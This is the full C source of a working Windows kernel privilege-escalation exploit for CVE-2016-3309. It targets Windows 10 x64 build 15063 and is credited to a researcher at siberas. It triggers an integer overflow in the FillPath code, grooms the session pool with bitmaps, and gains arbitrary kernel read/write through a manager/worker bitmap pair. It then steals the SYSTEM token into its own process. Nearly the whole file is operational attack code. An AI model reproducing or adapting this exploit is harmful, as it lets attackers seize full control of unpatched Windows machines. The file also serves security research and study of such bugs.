#include <Windows.h>
#include <stdio.h>

/*
0: kd> dt ntdll!_EPROCESS uniqueprocessid token activeprocesslinks.
dtx is unsupported for this scenario.  It only recognizes dtx [<type>] [<address>] with -a, -h, and -r.  Reverting to dt.
+0x2e0 UniqueProcessId     : Ptr64 Void
+0x2e8 ActiveProcessLinks  :
+0x000 Flink               : Ptr64 _LIST_ENTRY
+0x008 Blink               : Ptr64 _LIST_ENTRY
+0x358 Token               : _EX_FAST_REF
*/
typedef struct
{
	DWORD UniqueProcessIdOffset;
	DWORD ActiveProcessLinksOffset;
	DWORD TokenOffset;

	/*
	unfortunately, the nt!EmpCheckErrataList is not exported.
	but you can get the offset like this:
	0: kd> ? nt!EmpCheckErrataList - nt
	Evaluate expression: 1284192 = 00000000`00139860
	*/
	DWORD nt_EmpCheckErrataList_offset;
} VersionSpecificConfig;

VersionSpecificConfig gConfig = { 0x2e0, 0x2e8, 0x358, 0x139860, }; // win10 x64, build 15063.540

HBITMAP pwnd_bitmap;
HBITMAP manager_bitmap = 0;
HBITMAP worker_bitmap = 0;
int bitmap_overwrite_count_until_sizlBitmap = 0xdd0;
int bitmap_overwrite_count_until_pvScan0 = bitmap_overwrite_count_until_sizlBitmap + 0x18;
bool go = false;
BYTE* manager_bits;

typedef struct target_objs_ {
	HBITMAP dummy_bitmap;
	HBITMAP pwnd_bitmap;
	HBITMAP manager_bitmap;
	HBITMAP worker_bitmap;
}target_objs;

int create_objs_count = 0x800;
target_objs* targets_objects;

// make these global as well for accessibility in cleanup
HDC hdc;
HDC hMemDC;
HGDIOBJ bitmap;
HGDIOBJ bitobj;

typedef HANDLE(WINAPI* ZwUserConvertMemHandle)(BYTE* buf, DWORD size);
ZwUserConvertMemHandle pfnUserConvertMemHandle = 0;
HANDLE AllocateOnSessionPool(unsigned int size) {
	if (!pfnUserConvertMemHandle) {
		pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("win32u.dll"), "NtUserConvertMemHandle");
		if (!pfnUserConvertMemHandle) {
			// on win8.1 this function is located in user32.dll
			pfnUserConvertMemHandle = (ZwUserConvertMemHandle)GetProcAddress(LoadLibrary("user32.dll"), "NtUserConvertMemHandle");
			if (!pfnUserConvertMemHandle) {
				printf("could not find win32u!NtUserConvertMemHandle. exiting.\n");
				return INVALID_HANDLE_VALUE;
			}
		}
		//printf("pfnUserConvertMemHandle @ 0x%llx\n", (UINT64)pfnUserConvertMemHandle);
	}
	/*
	alloc_size will be passed to HMAllocObject, i.e. pool buffer will be preceded by 0x10 bytes header - that's why we calc -0x10
	the -0x14 comes from win32kfull!ConvertMemHandle  (lea r9d, [rdi+14h])
	*/
	int alloc_size = size - 0x14;
	BYTE *buffer = (BYTE*)malloc(alloc_size);
	memset(buffer, 0x41, alloc_size);
	HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, size);
	BYTE* buf = (BYTE*)GlobalLock(hMem);
	memcpy(buf, buffer, alloc_size);
	HANDLE hMem2 = pfnUserConvertMemHandle(buf, alloc_size);
	GlobalUnlock(hMem);
	return hMem;
}

void FreeFromSessionPool(HANDLE hMem) {
	/*
	for some reason, this doesn't work. TODO!
	*/
	SetClipboardData(CF_TEXT, hMem);
	EmptyClipboard();
}

HBITMAP createBitmapOfSize(int size) {
	/*
	# size is EXCLUDING header, i.e. if we want 0x400 on pool we will allocate 0x3f0 (+0x10 will be header)
	# the minimum size is 0x390!

	CreateBitmap(1, x, 1, 1, 0);
	- with x == 0x44 => alloc 0x380 (== 0x390 on pool)
	- with x == 0x48 => alloc 0x390 (== 0x3a0 on pool)
	- with x == 0x4c => alloc 0x3a0 (== 0x3b0 on pool)

	if we want to alloc 0x3b0 on pool we need 0x3a0 for PALLOCMEM2
	=> (0x3b0 - 0x380) / 0x10 = 3
	pass 0x44 + (3-1)*4 as param
	*/
	if (size < 0x390) {
		printf("bad size! can't allocate bitmap of size < 0x390!\n");
		return 0;
	}
	if (size % 0x10) {
		printf("bad size! must be a multiple of 0x10!\n");
		return 0;
	}
	int cnt = (size - 0x380) / 0x10;
	return CreateBitmap(1, 0x44 + cnt * 4, 1, 32, 0);
}

HBITMAP createCompatibleBitmapOfSize(int size) {
	/*
	# size is INCLUDING header, i.e. if we want 0x400 on pool we will allocate 0x3f0 (+0x10 will be header)
	# the minimum size is 0x280!

	00 fffff9c5`398ae07c : 00000000`00000000 00000000`00000000 00000000`00000100 00000000`80000004 : win32kbase!AllocateObject
	01 fffff9c5`398aeb3f : 00000000`00000000 00000000`00000000 00000000`00000100 00000000`80000004 : win32kbase!SURFACE::Allocate+0x20
	02 fffff9c5`38cca18a : 00000000`00000004 00000000`00000670 00000000`00000000 00000000`00000000 : win32kbase!SURFMEM::bCreateDIB+0x2bf
	03 fffff9c5`38c865ed : fffff98a`c0013200 fffff98a`c0013200 00000000`00000001 00000000`00000100 : win32kfull!hsurfCreateCompatibleSurface+0x3fa
	04 fffff9c5`38cf2b5f : ffffac86`005b0480 fffff9c5`00000000 00000000`00000001 00000000`00000006 : win32kfull!GreCreateCompatibleBitmapInternal+0x255
	05 fffff803`bdc0e413 : ffffac86`005b0480 ffffd781`fe509b80 00000000`00000000 00000000`00000000 : win32kfull!NtGdiCreateCompatibleBitmap+0x1f


	CreateCompatibleBitmap(hdc, 1, x);
	- with x == 0x8 => alloc 0x290 (== 0x2a0 on pool)

	0x4 -> 0x280
	0x8 -> 0x290
	...
	0x100 -> 0x670
	*/

	if (size < 0x280) {
		printf("bad size! can't allocate compatible bitmap of size < 0x280!\n");
		return 0;
	}
	if (size % 0x10) {
		printf("bad size! must be a multiple of 0x10!\n");
		return 0;
	}
	int cnt = (size - 0x270) / 4;
	return CreateCompatibleBitmap(GetDC(0), 1, cnt);
}

int writeOOB_bitmap(UINT64 target_address, BYTE* data, int size) {
	if (!manager_bitmap || !worker_bitmap) {
		printf("[-] bitmaps not initialized yet!\n");
		return 0;
	}

	if (!manager_bits) {
		// need to read with GetBitmapBits at least once before we can start
		printf("[-] manager_bits not initialized yet!\n");
		return 0;
	}

	// set dw2 in sizlBitmap
	memcpy(&manager_bits[bitmap_overwrite_count_until_pvScan0 - 0x1c], &size, sizeof(DWORD));

	// set pvScan0 to target_address
	memcpy(&manager_bits[bitmap_overwrite_count_until_pvScan0 - 0x8], &target_address, sizeof(UINT64));

	// set data to copy
	memcpy(manager_bits, data, size);

	// overflow into worker_bitmap to set values
	SetBitmapBits(manager_bitmap, bitmap_overwrite_count_until_pvScan0, manager_bits);

	// trigger SetBitmapBits on worker_bitmap to write the actual data
	return SetBitmapBits(worker_bitmap, size, data);
}

int readOOB_bitmap(UINT64 target_address, BYTE* data, int size) {
	if (!manager_bitmap || !worker_bitmap) {
		printf("[-] bitmaps not initialized yet!\n");
		return 0;
	}

	if (!manager_bits) {
		// need to read with GetBitmapBits at least once before we can start
		printf("[-] manager_bits not initialized yet!\n");
		return 0;
	}
	
	// set dw2 in sizlBitmap
	memcpy(&manager_bits[bitmap_overwrite_count_until_pvScan0 - 0x1c], &size, sizeof(DWORD));

	// set pvScan0 to target_address
	memcpy(&manager_bits[bitmap_overwrite_count_until_pvScan0 - 0x8], &target_address, sizeof(UINT64));

	// overflow into worker_bitmap to set values
	SetBitmapBits(manager_bitmap, bitmap_overwrite_count_until_pvScan0, manager_bits);
	
	// trigger GetBitmapBits on worker_bitmap to read the actual data
	return GetBitmapBits(worker_bitmap, size, data);
}

void continuation_thread() {

	printf("[+] continuation thread waiting for signal...\n");
	while (!go)
		Sleep(100);

	// now we're in the overflow loop in the main thread. wait a bit to make sure we've hit the overflow
	Sleep(1000);

	printf("[+] now check overflow success in continuation thread\n");

	// stay in loop of GetBitmapBits read attempts until we detect that we have OOB RW capabilities
	int oob_read_count = 0x1000;
	manager_bits = (BYTE*)malloc(oob_read_count);
	int cRead = GetBitmapBits(manager_bitmap, oob_read_count, manager_bits);
	if (cRead != oob_read_count) {
		printf("[-] could not detect arbitrary RW. expected to read 0x%x but only got 0x%x\n", oob_read_count, cRead);
		return;
	}

	printf("[+] successfully detected OOB RW capability in continuation thread!\n");
	
	/////// as soon as we have arbitrary RW we repair several structure members 
	UINT64 worker_bitmap_obj = (UINT64)manager_bits + bitmap_overwrite_count_until_pvScan0 - 0x58;
	//printf("[+] worker bitmap object is @ 0x%llx\n", worker_bitmap_obj);
	
	/////// then we repair the overwritten handle of the pwnd_bitmap!

	// original_pvscan0 points to manager_bitmap + 0x270 (or pool page + 0x280)
	UINT64 worker_bitmap_pvscan0 = *(UINT64*)(worker_bitmap_obj + 0x50);
	printf("[+] worker_bitmap_pvscan0: 0x%llx\n", worker_bitmap_pvscan0);
	DWORD offset_pvScan0_to_start_BitmapObject = 0x270;
	UINT64 pwnd_bitmap_address = worker_bitmap_pvscan0 - offset_pvScan0_to_start_BitmapObject - 0x2000;
	UINT64 manager_bitmap_address = worker_bitmap_pvscan0 - offset_pvScan0_to_start_BitmapObject - 0x1000;
	UINT64 worker_bitmap_address = worker_bitmap_pvscan0 - offset_pvScan0_to_start_BitmapObject;
	printf("[+] pwnd bitmap located @ 0x%llx\n", pwnd_bitmap_address);
	printf("[+] manager bitmap located @ 0x%llx\n", manager_bitmap_address);
	printf("[+] worker bitmap located @ 0x%llx\n", worker_bitmap_address);

	printf("[+] repairing BASEOBJ64.hHmgr value of pwnd_bitmap (0x%llx) at address 0x%llx\n", (UINT64)pwnd_bitmap, pwnd_bitmap_address);

	int cWritten = writeOOB_bitmap(pwnd_bitmap_address, (BYTE*)&pwnd_bitmap, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of pwnd_bitmap handle failed!\n");
		return;
	}

	printf("[+] repairing pool header of pwnd_bitmap\n");
	/*
	fix pool header, this is static for a given size.
	0: kd> db ffffe428`9c5f8000+2000
	ffffe428`9c5fa000  00 00 ff 23 47 68 30 35-00 00 00 00 00 00 00 00  ...#Gh05........
	ffffe428`9c5fa010  50 08 05 0c 00 00 00 00-00 00 00 00 00 00 00 00  P...............
	ffffe428`9c5fa020  80 c0 3b d7 81 a9 ff ff-00 00 00 00 00 00 00 00  ..;.............
	*/
	BYTE pool_header_bitmap[] = "\x00\x00\xff\x23\x47\x68\x30\x35\x00\x00\x00\x00\x00\x00\x00\x00";
	cWritten = writeOOB_bitmap(pwnd_bitmap_address - 0x10, (BYTE*)&pool_header_bitmap, sizeof(pool_header_bitmap) - 1);
	if (cWritten != sizeof(pool_header_bitmap) - 1) {
		printf("[-] repair of pool_header_bitmap failed!\n");
		return;
	}
	
	printf("[+] repairing ref counts of pwnd bitmap and manager bitmap\n");
	UINT64 null_ptr = 0;
	cWritten = writeOOB_bitmap(pwnd_bitmap_address + 0x8, (BYTE*)&null_ptr, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of ref count for pwnd_bitmap failed!\n");
		return;
	}
	cWritten = writeOOB_bitmap(manager_bitmap_address + 0x8, (BYTE*)&null_ptr, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] repair of ref count for manager_bitmap failed!\n");
		return;
	}

	printf("[+] repairing pool header after pwnd_bitmap buffer\n");
	BYTE next_pool_header[] = "\xff\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
	cWritten = writeOOB_bitmap(manager_bitmap_address - 0x20, (BYTE*)&next_pool_header, sizeof(next_pool_header) - 1);
	if (cWritten != sizeof(next_pool_header) - 1) {
		printf("[-] repair of next_pool_header failed!\n");
		return;
	}

	printf("[+] now getting ntoskrnl base\n");
	
	UINT64 nt_EmpCheckErrataList = 0;
	UINT64 tid_ptr = *(UINT64*)(worker_bitmap_obj + 0x10); // the BASEOBJECT64 structure seems to have changed. obviously, this is not a tid ;)
	printf("[+] reading nt!EmpCheckErrataList from @ 0x%llx\n", tid_ptr + 0x2a8);
	cRead = readOOB_bitmap(tid_ptr + 0x2a8, (BYTE*)&nt_EmpCheckErrataList, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !nt_EmpCheckErrataList) {
		printf("[-] couldn't read nt!EmpCheckErrataList pointer!\n");
		return;
	}

	printf("[+] nt!EmpCheckErrataList @ 0x%llx\n", nt_EmpCheckErrataList);

	UINT64 ntoskrnl_base_address = nt_EmpCheckErrataList - gConfig.nt_EmpCheckErrataList_offset;
	printf("[+] ntoskrnl base address: 0x%llx\n", ntoskrnl_base_address);

	UINT64 ntoskrnl = (UINT64)LoadLibrary("ntoskrnl.exe");
	// get address of exported PsInitialSystemProcess variable
	UINT64 pPsInitialSystemProcess = (UINT64)GetProcAddress((HMODULE)ntoskrnl, "PsInitialSystemProcess");
	UINT64 delta_PsInitialSystemProcess = pPsInitialSystemProcess - ntoskrnl;
	FreeLibrary((HMODULE)ntoskrnl);

	printf("[+] reading system EPROCESS from 0x%llx\n", ntoskrnl_base_address + delta_PsInitialSystemProcess);
	UINT64 system_eprocess = 0;
	// subtract addr from ntos to get PsInitialSystemProcess offset from base
	cRead = readOOB_bitmap(ntoskrnl_base_address + delta_PsInitialSystemProcess, (BYTE *)&system_eprocess, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !system_eprocess) {
		printf("[-] couldn't read SYSTEM eprocess!\n");
		return;
	}

	printf("[+] system eprocess @ 0x%llx\n", system_eprocess);

	// walk ActiveProcessLinks until we find our Pid
	LIST_ENTRY ActiveProcessLinks;
	cRead = readOOB_bitmap(system_eprocess + gConfig.ActiveProcessLinksOffset, (BYTE*)&ActiveProcessLinks, sizeof(LIST_ENTRY));
	if (cRead != sizeof(LIST_ENTRY) || !ActiveProcessLinks.Flink) {
		printf("[-] couldn't read ActiveProcessLinks!\n");
		return;
	}

	printf("[+] now walking ActiveProcessLinks to find EPROCESS of current process...\n");
	UINT64 pEPROCESS = 0;
	UINT64 current_proc_eprocess = 0;
	UINT64 UniqueProcessId = 0;
	while (1) {
		pEPROCESS = (UINT64)ActiveProcessLinks.Flink - gConfig.ActiveProcessLinksOffset;

		// get pid of current EPROCESS
		cRead = readOOB_bitmap(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE*)&UniqueProcessId, sizeof(UINT64));
		if (cRead != sizeof(UINT64) || !UniqueProcessId) {
			printf("[-] could not read ActiveProcessLinks!\n");
			break;
		}
		//printf("[+] pEPROCESS 0x%llx, PID 0x%llx (0x%x)\n", pEPROCESS, UniqueProcessId, GetCurrentProcessId());

		// is this our pid? break loop if this is the case
		if (GetCurrentProcessId() == UniqueProcessId) {
			current_proc_eprocess = pEPROCESS;
			break;
		}

		// get next entry
		cRead = readOOB_bitmap(pEPROCESS + gConfig.ActiveProcessLinksOffset, (BYTE*)&ActiveProcessLinks, sizeof(LIST_ENTRY));
		if (cRead != sizeof(LIST_ENTRY) || !ActiveProcessLinks.Flink) {
			printf("[-] could not read ActiveProcessLinks!\n");
			break;
		}

		// if next same as last, we reached the end
		if (pEPROCESS == (UINT64)ActiveProcessLinks.Flink - gConfig.ActiveProcessLinksOffset)
			break;
	}

	if (!current_proc_eprocess) {
		printf("[-] walking EPROCESS structures failed: could not spot current process EPROCESS!\n");
		return;
	}

	printf("[+] found EPROCESS of current process @ 0x%llx\n", current_proc_eprocess);
	printf("[+] getting SYSTEM token\n");
	UINT64 SystemToken = 0;
	cRead = readOOB_bitmap(system_eprocess + gConfig.TokenOffset, (BYTE*)&SystemToken, sizeof(UINT64));
	if (cRead != sizeof(UINT64) || !SystemToken) {
		printf("[-] could not read SYSTEM token\n");
		return;
	}

	printf("[+] writing SYSTEM token to current EPROCESS\n");
	cWritten = writeOOB_bitmap(current_proc_eprocess + gConfig.TokenOffset, (BYTE*)&SystemToken, sizeof(UINT64));
	if (cWritten != sizeof(UINT64)) {
		printf("[-] writing SYSTEM token failed!\n");
		return;
	}

	printf("[+] cleanup...\n");
	for (int i = 0; i < create_objs_count; i++) {
		DeleteObject(targets_objects[i].dummy_bitmap);
		// we only skip the pwnd bitmap since it is locked by the SetBitmapBits syscall in main thread :)
		if (targets_objects[i].manager_bitmap != manager_bitmap)
			DeleteObject(targets_objects[i].pwnd_bitmap);
		DeleteObject(targets_objects[i].manager_bitmap);
		DeleteObject(targets_objects[i].worker_bitmap);
	}
	DeleteObject(bitobj);
	DeleteObject(bitmap);
	DeleteDC(hMemDC);
	ReleaseDC(NULL, hdc);

	printf("[+] done.\n");
	return;
}

void main(int argc, char* argv[]) {
	printf("[+] win32kfull!bFill (aka. CVE-2016-3309) reloaded, @bitshifter123, siberas, 10/2017\n");
	printf("[+] target: Windows 10 x64 RS2 (build 15063.540)\n");
	printf("[+] exploitation primitive: BITMAPS\n");

	hdc = GetDC(NULL);
	hMemDC = CreateCompatibleDC(hdc);
	bitmap = CreateBitmap(0x666, 0x1338, 1, 32, NULL);
	bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);

	UINT64 fakeaddr = 0x100000000;
	UINT64 fakeptr = (UINT64)VirtualAlloc((LPVOID)fakeaddr, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (!fakeptr || fakeptr != fakeaddr) {
		printf("[-] VirtualAlloc Failed! ret: 0x%llx (Error 0x%x)\n", fakeptr, GetLastError());
		return;
	}
	memset((PVOID)fakeptr, 0x1, 0x100);

	bool success = false;
	BYTE *bitmap_bits = (BYTE*)malloc(bitmap_overwrite_count_until_sizlBitmap * 4);
	memset(bitmap_bits, 0x04, bitmap_overwrite_count_until_sizlBitmap * 4);

	UINT64 sizeX = 0x1;
	UINT64 sizeY = 0x1338;
	memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 4], &sizeX, 0x4);
	memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 8], &sizeY, 0x4);
	UINT64 null_ptr = 0;
	memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 0x10], &null_ptr, sizeof(UINT64));

	// kick off second thread which will keep us alive as soon as we hit the 
	// loop which checks for the successful overwrite
	DWORD tid;
	CreateThread(0, 0, (LPTHREAD_START_ROUTINE)continuation_thread, 0, 0, &tid);

	/*
	// offset +0
	0x30: 0x10000 * 0x10000 = 0x10000000 => 0x10000001 * 0x30 = (int32)0x30
	0x60: 0x11 * 0xf0f0f1 = 0x10000001 => 0x10000002 * 0x30 = (int32)0x60
	0x90: 0xc06*0x154ab = 0x10000002 => 0x10000003 * 0x30 = (int32)0x90

	// offset +10
	0x10: 0xccd*0xd552	= 0xaaaaaaa => 0xaaaaaab *0x30 = 0x200000010 = (int32)0x10 => alloc of 0x20
	0x40: 0x3b*0x2e4851	= 0xaaaaaab => 0xaaaaaac *0x30 = 0x200000040 = (int32)0x40 => alloc of 0x50
	0x70: 0x804*0x154ab	= 0xaaaaaac => 0xaaaaaad *0x30 = 0x200000070 = (int32)0x70 => alloc of 0x80
	0xa0: 0x1769*0x74a5	= 0xaaaaaad => 0xaaaaaae *0x30 = 0x2000000a0 = (int32)0xa0 => alloc of 0xb0

	// offset +20
	0x20: 0x27b*0x2266f = 0x5555555 => 0x5555556 * 0x30 = (int32)0x20 => alloc of 0x30 bytes
	0x50: 0x156*0x3FE01 = 0x5555556 => 0x5555557 * 0x30 = (int32)0x50 => alloc of 0x60 bytes
	0x80: 0xa1*0x87af7	= 0x5555557 => 0x5555558 * 0x30 = (int32)0x80 => alloc of 0x90 bytes
	0xb0: 0xfd3*0x5648	= 0x5555558 => 0x5555559 * 0x30 = (int32)0xb0 => alloc of 0xc0 bytes
	0xe0: 0x13369*0x471	= 0x5555559 => 0x555555a * 0x30 = (int32)0xe0 => alloc of 0xf0 bytes
	*/
	int sizeA = 0x1769;
	int sizeB = 0x74a5;
	// both sizes are WITHOUT header, i.e. if they should add up to 0x1000
	// we need for example chunksize 0xf40 and bitmap_size 0xa0. 0xf40 + 0x10 + 0xa0 + 0x10 == 0x1000
	DWORD chunksize = (DWORD)(((sizeA * sizeB) + 1) * 0x30);
	UINT64 real_size = (((UINT64)sizeA * (UINT64)sizeB) + 1) * 0x30;
	int bitmap_size = 0x1000 - 0x10 - chunksize - 0x10;
	//printf("[+] sizeA 0x%x\n", sizeA);
	//printf("[+] sizeB 0x%x\n", sizeB);
	printf("[+] prepare int overflow: ((0x%x * 0x%x) + 1) * 0x30 == 0x%llx == (int32) 0x%x\n", sizeA, sizeB, real_size, chunksize);
	//printf("[+] chunksize == 0x%x => bitmap_size == 0x%x\n", chunksize, bitmap_size);
	printf("[+] header + chunksize + header + bitmap_size = 0x%x + 0x10 + 0x%x + 0x10 = 0x%x\n", chunksize, bitmap_size, chunksize + 0x10 + bitmap_size + 0x10);

	if (chunksize > 0x1000 ||
		bitmap_size > 0x1000 ||
		bitmap_size + chunksize + 0x20 != 0x1000) {
		printf("[-] bad sizes!? exiting!\n");
		return;
	}

	POINT* points = (POINT*)malloc(sizeB * sizeof(POINT));
	DWORD point_value = 0x66000000;
	for (int x = 0; x < sizeB; x++) {
		points[x].x = point_value;
		points[x].y = point_value;
	}

	printf("[BUG 1/4] BeginPath\n");
	if (!BeginPath(hMemDC)) {
		printf("[-] BeginPath() Failed: %x\n", GetLastError());
		return;
	}

	printf("[BUG 2/4] PolylineTo\n");
	for (int j = 0; j < sizeA; j++) {
		if (j == 0)
		{
			points[1].x = 0x11223344;
			points[1].y = 0x360;
			points[2].x = 1;
			points[2].y = 0x400;
		}
		else
		{
			points[1].x = point_value;
			points[1].y = point_value;
			points[2].x = point_value;
			points[2].y = point_value;
		}

		if (!PolylineTo(hMemDC, points, sizeB)) {
			printf("[-] PolylineTo() Failed: %x\n", GetLastError());
			return;
		}
	}

	printf("[BUG 3/4] EndPath\n");
	EndPath(hMemDC);

	printf("[+] now perform pool feng shui...\n");
	//printf("[+] defragment size 0x%x!\n", chunksize + 0x10);
	Sleep(100);
	
	SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);

	// defragment on page level  we will cause 0xfe0 + 0x10 = 0xff0-sized buffers, filling one pool page each
	for (int i = 0; i < 0x400; i++) {
		AllocateOnSessionPool(0xfe0);
	}

	// defragment with chunksize - we will create buffer on pool of size chunsize + 0x10
	for (int i = 0; i < 0x5000; i++) {
		AllocateOnSessionPool(chunksize);
	}

	targets_objects = (target_objs*)calloc(create_objs_count, sizeof(target_objs));

	for (int i = 0; i < create_objs_count; i++) {
		targets_objects[i].dummy_bitmap   = createBitmapOfSize(bitmap_size);
		targets_objects[i].pwnd_bitmap    = createBitmapOfSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].manager_bitmap = createBitmapOfSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
		targets_objects[i].worker_bitmap  = createBitmapOfSize(0xfe0); // -> pool will be 0xff0 alloc'ed / 0x10 free
	}

	// now trigger some more chunksize allocations to fill the holes
	for (int i = 0; i < create_objs_count / 2; i++) {
		AllocateOnSessionPool(chunksize);
	}

	// finally, trigger bug in FillPath!
	FillPath(hMemDC);

	SetPriorityClass(GetCurrentProcess(), NORMAL_PRIORITY_CLASS);
	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);

	printf("[BUG 4/4] hit trigger in FillPath!\n");

	/*
	fix pool header, this is static for a given size. errm. lol. kernel hacking is so 1999 >_<
	0: kd> db ffffe428`9c5f8000+2000
	ffffe428`9c5fa000  00 00 ff 23 47 68 30 35-00 00 00 00 00 00 00 00  ...#Gh05........
	ffffe428`9c5fa010  50 08 05 0c 00 00 00 00-00 00 00 00 00 00 00 00  P...............
	ffffe428`9c5fa020  80 c0 3b d7 81 a9 ff ff-00 00 00 00 00 00 00 00  ..;.............
	*/
	BYTE pool_header_bitmap[] = "\x00\x00\xff\x23\x47\x68\x30\x35\x00\x00\x00\x00\x00\x00\x00\x00";
	memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 0x50], &pool_header_bitmap, sizeof(pool_header_bitmap) - 1);
	
	printf("[+] trigger 2nd overflow via SetBitmapBits - main thread will deadlock now\n");
	Sleep(100);

	// set flag for continuation thread and hit SetBitmapBits right afterwards
	go = true;
	
	// trigger overflow into manager bitmap to set sizlBitmap.x field
	// be carful to overwrite with correct BaseObject.hHmgr!
	for (int i = create_objs_count - 1; i >= 0; i--) {

		// set global bitmap vars. 
		pwnd_bitmap = targets_objects[i].pwnd_bitmap;
		manager_bitmap = targets_objects[i].manager_bitmap;
		worker_bitmap = targets_objects[i].worker_bitmap;

		// make sure we overwrite with the correct BASEOBJET64.hHmgr value!
		memcpy(&bitmap_bits[bitmap_overwrite_count_until_sizlBitmap - 0x40], &targets_objects[i].manager_bitmap, sizeof(UINT64));

		// attempt overflow. if we hit the overwritten object we'll never return from this call
		if (SetBitmapBits(targets_objects[i].pwnd_bitmap, bitmap_overwrite_count_until_sizlBitmap, bitmap_bits) == bitmap_overwrite_count_until_sizlBitmap)
			break;
	}
	
	// do not exit main thread if we return from the loop without hitting the overwrite
	// if something else got overwritten you'd just BSOD your machine ;)
	Sleep(-1);
}
